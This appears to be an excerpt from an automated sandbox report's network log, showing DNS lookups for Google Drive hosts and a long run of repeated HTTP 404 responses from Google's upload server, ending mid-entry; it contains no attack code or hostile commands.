Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ1WfKLDAmmF4wbrnbD8UaVl1cv_ED6pXiEnKwFrloVCho9HxmBwpWdZsCAINMU0chXEntWHfgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:09:51 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-lIghmXnHWEOvIZNT4Hw-hA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=npy1wdI3ibOrhytr5OamF18y8JeCsDLRVBCntY4S63dg4qNL8OBjhypOqrGARKu3BsenVGC-i7xshN7EpFXiWR2AvMhB__kyv36hi7RltRkkVeAGNwv_sGPCkiY03l7CfToRChp8WY790lWrpCxPT7ve76Bz2rSv3aJA92HeJjbOhpbZvYDl6D5rB3O1; expires=Sun, 13-Jul-2025 04:09:51 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC63t_Dk2M1kWtQx8lwQ51IFeu1b26Xwddk299SDaIhf7rUlqHJJVDxaXNGkm8SJb4hnContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:09:54 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-C9iWnsURsvr2OPnGO8Zd0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRTq_IcLHyB4vsfmZ9QzCYKqU8BLkupkEJ3hYlbgEbVdL8uhzDSYjdnUCmM7N6jcBbzLFSUW8wContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:09:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-9fiIFkd1qNCWGE-gVBSdTA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT_63tt1kHZx4KY_rOs8EqmalHEO8KsUcujVyytHKD-zdlIuISwVHcrLfTmwQc8i9MCc_Ou8sMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:09:58 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-9nvP3GDLQMb03HkX5iBPZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQDAP25Lf_bogmXBB_rV1jYVE-f7h5U_0yfeF5q6fLJaxXhnGVLnbP1Y2H0SbPO6Va-eM1U_ZUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:01 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-7QFrbQ4V0xtVOs2Vx3NtkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ8dnqcek4xtD0CIrfRIg9IlgVWdGMv4l8evxzkdvVE2oCphKzNkHoJKYxZd2P_QcssContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:03 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-XFvFRvD552__qvyMaeXTEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSdAj-_QBtwyXji2uEb4VFq5UfLly1N2ysFF0lSkdlbunL-MaV2cKgirwBn-b2rGnt3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:05 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-A8swVLc9BQmMYDnogRkxwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT9fLoagdcZuuAS6PbibJVSn4W2sffGV5yU2J0lKcgVKf_AdsxPfcHiUEyeild1mCFEpEvB4mUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:08 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-lNlf0ztMUQY7_-1c3AfebQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQWkfj8AepfxawyWkWJGSwC6q5voVuNXjh93cta3x7pIeBaEpFFsdZJ5JrsiogqUVOMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:10 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-NT8LvLpQctzKIZ4GY1DYkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSV2WgLzjkI0c3eYUHKO10sJIu9iZSqnkV5g7RwbV3KUYAFQrxagqN19nC6NooD7m2WContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:12 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-taLJ3175q4B0-BxrblRU3A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRBaELBUbRqchWf9W8xNublvqz8V89gPEAkZGu5KgBhN4hoshk95cGnjZGKPbQ6ECkvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:14 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce--zFc8oEEJW_Kr9-JM-QQ7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSrsdMJu0M8hZG-RkyeBAck4ktcNuDs0xV4MqIq4AJc_IqPTkmSaT-PDfto88w5WgtEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:17 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-eomPmVcYkncr8swG06CPHA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTNXtB9k2jPYxbsmStKflIAOm0cYZjJgVArdeVMZaFDiS9lvU_5ae2o4YZqPM_JZl2C7w1OPWcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:19 GMTContent-Security-Policy: script-src 'nonce-O_w9ITB3uFY6AKkr6kEaxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRxBHL0fy4D2ymoZmJ_NsrFAKLtdFBsXkfeKC4mxGIkpAkfPD5EjOvigivnWc2276d0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:21 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-reuN57xqMAU1ZX6PpEPPzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTJbE7s8Fr0VH_XIygnSYPA1aI5cS0aJEr-9pyS1Rr51D3mq6mzzeVWahVHfd-H70w7xEbLQZAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:10:23 GMTPermissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-WSoUthiWLoS__dDDTy1trA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com 